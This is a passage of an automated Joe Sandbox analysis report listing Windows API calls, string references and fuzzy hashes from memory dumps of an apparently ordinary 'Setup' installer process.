                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                                                                                                                                    • String ID: ApplicableIf$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                                                                                                                                    • API String ID: 2724732616-3920316726
                                                                                                                                                                    • Opcode ID: a0bc3cc61afbfcdbb45971aa35cafa83819d83f4c6d06a318c632d6ef03edd4a
                                                                                                                                                                    • Instruction ID: ad210e37fe453bce26ed326fde02fccedb50874f6190bc527921eeefc50489ef
                                                                                                                                                                    • Opcode Fuzzy Hash: a0bc3cc61afbfcdbb45971aa35cafa83819d83f4c6d06a318c632d6ef03edd4a
                                                                                                                                                                    • Instruction Fuzzy Hash: 50213D75810248EBCF11DBE8C944EDE7BB8AF15318F54D168F124ABA91C7359B188772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 69DB365F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB3669
                                                                                                                                                                      • Part of subcall function 69D77479: __EH_prolog3.LIBCMT ref: 69D77480
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DB368B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                                                                                                                                    • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                                                                                                                                    • API String ID: 3752544998-2579124284
                                                                                                                                                                    • Opcode ID: de67a4823861c67728b8989b0fb3d6c316bc3417d54c51e97a2e00ee9db91cb2
                                                                                                                                                                    • Instruction ID: 8dd08c802d887ee5322cb0bf332ddde054cc1d70be4237465d136aff54a4d820
                                                                                                                                                                    • Opcode Fuzzy Hash: de67a4823861c67728b8989b0fb3d6c316bc3417d54c51e97a2e00ee9db91cb2
                                                                                                                                                                    • Instruction Fuzzy Hash: CA1190B4A00209EFDF04DFA9C999C6EF7F9FF48304B11482DE442A7241DB70A900CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ED07A
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 698ED130
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    Strings
                                                                                                                                                                    • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 698ED0F4
                                                                                                                                                                    • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 698ED0A3
                                                                                                                                                                    • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 698ED0BF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ItemText
                                                                                                                                                                    • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                                                                                                                                    • API String ID: 2878149499-3033223209
                                                                                                                                                                    • Opcode ID: be08ba405ad37fae871a884f403d95b47cb2511d5f2dcc5b3e10faaf4678374b
                                                                                                                                                                    • Instruction ID: 01f965454baf2c81b0e87229881a854bf328c0cb507debb872d111d644f639ff
                                                                                                                                                                    • Opcode Fuzzy Hash: be08ba405ad37fae871a884f403d95b47cb2511d5f2dcc5b3e10faaf4678374b
                                                                                                                                                                    • Instruction Fuzzy Hash: 85219231900249DFCB00DBB8C95896EBBF5FF56308F18885DE055EB2A1DB31E909CB11
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ECFAC
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • GetDlgItem.USER32(?,00000067), ref: 698ED018
                                                                                                                                                                      • Part of subcall function 698DE2E1: GetCurrentProcess.KERNEL32(00000000,0000000D,?,?,698EDFD0,00000000), ref: 698DE319
                                                                                                                                                                      • Part of subcall function 698DE2E1: FlushInstructionCache.KERNEL32(00000000,?,?,698EDFD0,00000000), ref: 698DE320
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 698ED041
                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 698ED05A
                                                                                                                                                                    Strings
                                                                                                                                                                    • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 698ECFB5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                                                                                                                                    • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                                                                                                                                    • API String ID: 2244164258-355004722
                                                                                                                                                                    • Opcode ID: a1e8d3e3cbe35deacaf72b00e5bf8f9d3987c3f6ce3d46bea663bed16d81b482
                                                                                                                                                                    • Instruction ID: 9721caa8e122587cb0dcd5dd2add169c4fe48198d36637090db61330051d5e98
                                                                                                                                                                    • Opcode Fuzzy Hash: a1e8d3e3cbe35deacaf72b00e5bf8f9d3987c3f6ce3d46bea663bed16d81b482
                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A131900215DFCF10DFA8C848AAEBBF5FF59318B14895CE465EB2A1D731D909CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
• __EH_prolog3.LIBCMT ref: 69D858FC
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
• StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,69DAFA6E,69DAFA6E,00000718,02602230,?,00000000,00000010,69D86171,00000000,00000748,?,ParameterInfo.xml), ref: 69D85972
• SysFreeString.OLEAUT32(69DAFA6E), ref: 69D859A3
  • Part of subcall function 69DC8C9E: _memcpy_s.LIBCMT ref: 69DC8CE4
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
• String ID: #(loc.$) <>"
• API String ID: 3035459583-3905424865
• Opcode ID: c1a0c48cbde1a8471dc04c2c2552eda8bb99f33eecd2534a8147957b059e5cbc
• Instruction ID: f76a847a3550229445e06cda5b5fde32cf83fff685dfa5d18ba6c8479b233216
• Opcode Fuzzy Hash: c1a0c48cbde1a8471dc04c2c2552eda8bb99f33eecd2534a8147957b059e5cbc
• Instruction Fuzzy Hash: 5C117F75D0015ADFCF00EFE4CE049AEBB79BF00368B419974E921E7A90D7349D198BA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA5874
• OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,69DBBDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 69DA58FB
• CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 69DA590B
• GetLastError.KERNEL32 ref: 69DA5913
  • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3Mutex$CreateErrorLastOpen
• String ID: Global\
• API String ID: 2685780869-188423391
• Opcode ID: d6f9d5995eaf45702138d14bd07b0a07c10cb4b0bac33756411bc0d3b284aa65
• Instruction ID: bcdbd6d13e3202efd1319ae45f7069e02aa52c50e27e04032005e692a46a0463
• Opcode Fuzzy Hash: d6f9d5995eaf45702138d14bd07b0a07c10cb4b0bac33756411bc0d3b284aa65
• Instruction Fuzzy Hash: 50215676500284DBEB01DF29C488B5E7BA1AF49328F108468E854CF742CB74D964CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698ED2C6
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
• SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 698ED2FC
• SetDlgItemTextW.USER32(?,00000008,00000000), ref: 698ED33B
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3ItemText
• String ID: IDS_CLOSE$IDS_CONTINUE
• API String ID: 2008326593-3637486705
• Opcode ID: 69cb98d72a3467fac91dadd24eadd71ffd5846c520b202a806ebdc55168a04ce
• Instruction ID: bb44094ab70510128ed32ce1e472a6ebe476bda56253806f8aed50a73bb46049
• Opcode Fuzzy Hash: 69cb98d72a3467fac91dadd24eadd71ffd5846c520b202a806ebdc55168a04ce
• Instruction Fuzzy Hash: 00117C35600205DFCB04DFA8C998A6EB7F5BF59718F148A5CE022EB2E0DB31A904CB10
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D94A46
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
• API String ID: 431132790-4185790000
• Opcode ID: ab3ceb6154b2130dbffb8cf79563d879ea0ebc2a4e7b1c281cae819277f0e46a
• Instruction ID: 68b061585c0de502128330069790ed070c32d272f8846ef13ca1cabd84b62311
• Opcode Fuzzy Hash: ab3ceb6154b2130dbffb8cf79563d879ea0ebc2a4e7b1c281cae819277f0e46a
• Instruction Fuzzy Hash: C3115E79900149EFCF00DFE4C844BEEBBB8AF15208F548075E560ABA91C7759A58CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698F584F
• GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B), ref: 698F58BC
• GetTokenInformation.KERNELBASE(?,00000001,00000010,00000008,00000008,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B), ref: 698F591F
• _strnlen.LIBCMT ref: 698F596F
  • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
• FindCloseChangeNotification.KERNEL32(?,?,?,698F55AE,?,00000000,?,?,?,?,00000024,698DF18B,?), ref: 698F599C
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: InformationToken$ChangeCloseException@8FindH_prolog3NotificationThrow_strnlen
• String ID:
• API String ID: 182814276-0
• Opcode ID: 024ceb8b59c1c1a5517cf7d57ab557b8e70824c7d3809f557048397b4252f821
• Instruction ID: 9989a220be231cc2eeb01acb8aaad6f97e9c8fba7934976fdc6e28701f790864
• Opcode Fuzzy Hash: 024ceb8b59c1c1a5517cf7d57ab557b8e70824c7d3809f557048397b4252f821
• Instruction Fuzzy Hash: C0716E7590020A9FDF00CFA8C845AAEBBB4FF15368F009A1CF525E7291D774DA56CBA1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBA4B6
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA523
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA566
                                                                                                                                                                    • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,69DA4614,00000008,00000104,?,?,69DBA210,?,00000000), ref: 69DBA59C
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,69DBA210,?,00000000,?,?,69DA4B23), ref: 69DBA5CF
                                                                                                                                                                    Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: InformationToken$AccountChangeCloseFindH_prolog3LookupNotification_wcsnlen
• String ID:
• API String ID: 385857651-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 69DA488A
  • Part of subcall function 69DA31D3: __EH_prolog3_catch.LIBCMT ref: 69DA31DA
  • Part of subcall function 69DA31D3: _free.LIBCMT ref: 69DA3269
• GetCurrentThread.KERNEL32 ref: 69DA495F
• OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 69DA4971
• GetCurrentProcess.KERNEL32 ref: 69DA497B
• OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 69DA498B
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
• String ID:
• API String ID: 4058884840-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69D85CE8
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
• CoInitialize.OLE32(00000000), ref: 69D85D1A
• CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000), ref: 69D85D38
• CoUninitialize.OLE32(?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 69D85DE8
• SysFreeString.OLEAUT32(00000738), ref: 69D85DF1
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
• String ID:
• API String ID: 2737710906-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69DB9BC3
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D7A8CC: __EH_prolog3.LIBCMT ref: 69D7A8D3
  • Part of subcall function 69D7A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A90B
  • Part of subcall function 69D7A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69D7A964
  • Part of subcall function 69D7A8CC: __CxxThrowException@8.LIBCMT ref: 69D7AA28
• GetCommandLineW.KERNEL32(?,?,69D6A794,?,?,00000164,69D94730,02602230,69D6A794,?,?,?,69DBB57F,?,00000000,?), ref: 69DB9BEF
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
• SysFreeString.OLEAUT32(?), ref: 69DB9C42
• SysFreeString.OLEAUT32(69DAFA6E), ref: 69DB9CCC
• SysFreeString.OLEAUT32(?), ref: 69DB9CF3
  • Part of subcall function 69D9473C: __EH_prolog3_catch.LIBCMT ref: 69D94746
  • Part of subcall function 69D9473C: CoInitialize.OLE32(00000000), ref: 69D947F7
  • Part of subcall function 69D9473C: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,?,?,69D73864,?,00000000,00000000,69DAFA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 69D94815
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
• String ID:
• API String ID: 3727545618-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog3_GS.LIBCMT ref: 698E665C
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698EF35E: __EH_prolog3.LIBCMT ref: 698EF365
  • Part of subcall function 698EF35E: __recalloc.LIBCMT ref: 698EF3A7
• _memset.LIBCMT ref: 698E66C3
• GetClientRect.USER32 ref: 698E66E6
• SendMessageW.USER32(00000001,00000432,00000000,?), ref: 698E66FC
  • Part of subcall function 698F81DE: _memcpy_s.LIBCMT ref: 698F8224
• RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,698E730F,?,?,?,?,?,?,?,?,?), ref: 698E6713
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
• String ID:
• API String ID: 4097222183-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• _malloc.LIBCMT ref: 69DD0F72
  • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
  • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
  • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
• _free.LIBCMT ref: 69DD0F85
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
                                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                                    • Opcode ID: 52bd6a224eb6b1a648a86305a1401c74534d9d9a9db99be3a0fd5d0dda47fba9
